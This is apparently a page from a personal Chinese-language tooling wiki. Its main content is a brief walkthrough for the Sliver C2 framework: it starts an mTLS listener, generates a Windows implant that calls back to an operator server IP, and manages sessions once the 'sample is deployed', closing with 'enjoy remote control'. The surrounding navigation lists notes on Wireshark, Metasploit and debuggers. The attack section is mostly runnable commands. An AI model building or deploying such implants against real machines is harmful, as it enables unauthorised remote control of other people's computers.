工具使用
Wireshark
Wireshark 过滤表达式
Wireshark 导出证书
x64dbg
x64dbg 配置PDB 符号文件symbols
x64dbg 内存布局页面奇怪的问题
Sliver
03 mtls C2 生成
metasploit
Metasploit 001 模块
Metasploit 问题解决:Unable to load the EventMachine C extension; To use the pure-ruby reactor, require 'em/pure_ruby'
Metasploit 002 基础使用
binwalk
binwalk 为什么不建议在 Windows 下安装
WinDbg
[转帖]WinDbg使用笔记
VSCode+Xdebug+PHPStudy
本文档使用 MrDoc 发布
-
+
首页
03 mtls C2 生成
### 环境: - Sliver version: v1.5.42 - Server:Ubuntu - Operator:Windows10 - Implant:Windows10 - 这里不得不吐槽:Sliver 生成的 Implants 文件太大了,HTTP 和 mtls 的 Windows Implant 大小都超过了 10M。 ### 生成样本 - 开启 mtls 监听 ``` mtls ``` - 查看 jobs ``` jobs ``` ![](/media/202406/2024-06-03_105321_1539580.6042728861369933.png) - 生成 mtls 的 Implants ``` generate --mtls <Server IP> --save ./mtls.exe --os Windows ``` - 查看生成的 Implants ``` implants ``` ![](/media/202406/2024-06-03_110036_1754060.26093189736617806.png) ### 投放 - 将样本投放出去,被连接后,会产生一条会话。查看会话 ``` sessions ``` ![](/media/202406/2024-06-03_111929_9005390.8144701174147827.png) - 操作会话 ![](/media/202406/2024-06-03_112113_5935440.43391866782301114.png) - 查看操作帮助 ``` help ``` - 开始愉快的远控吧
别卷了
2024年6月3日 11:37
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
分享
链接
类型
密码
更新密码